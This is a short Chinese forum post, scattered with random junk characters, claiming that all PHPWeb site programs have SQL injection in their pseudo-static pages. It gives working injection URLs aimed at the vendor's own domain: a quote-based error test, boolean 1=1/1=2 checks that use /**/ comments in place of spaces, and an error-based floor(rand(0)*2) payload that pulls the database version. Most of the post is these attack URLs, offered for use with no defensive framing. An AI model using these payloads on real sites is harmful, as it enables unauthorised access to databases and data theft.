phpweb所有的整站程序伪静态页面都存在sql注入
0 B" F7 M k' I3 K8 v d/ l7 o, }$ Y, Z
主站:http://phpweb.net/
: S, B; l1 ]. o9 ~加’检测:
* I) {+ Z" v! |1 @$ ^" w 9 O9 {' ~6 a% O' \9 i9 v
http://www.phpweb.net/down/html/?772′.html$ [; E4 j. D+ p( K3 N+ v. t
# h; I% o, U5 j# x" L! O出错8 E) k9 V. ~9 S. `" k
存在注入。6 O) R- C. Y9 F1 d+ e# n; ~6 R
不能用空格,只能用/*罗
5 \8 h0 o2 m* k5 S! }, O) ghttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
, y! c" n6 t- }' }) J# L# B
J# V. s% e5 d( |6 z" K2 _http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.1 Y; F: i# e$ Y- x3 C. x
爆数据库版本:1 I i- _! \( W! N: D9 ?
# y* N/ T8 [. [& u) `) O, [
?- O' A+ A7 q0 v# l8 l* l
1
" e1 Z: K% _* ]5 g. l4 g; [: w9 shttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
) ~3 [+ h$ x3 e) u更新日期: 2013-01-03 13:39:50
6 U3 l& [" g0 N5 v7 Q |
发表于 2013-1-4 19:46:42
收藏
支持
反对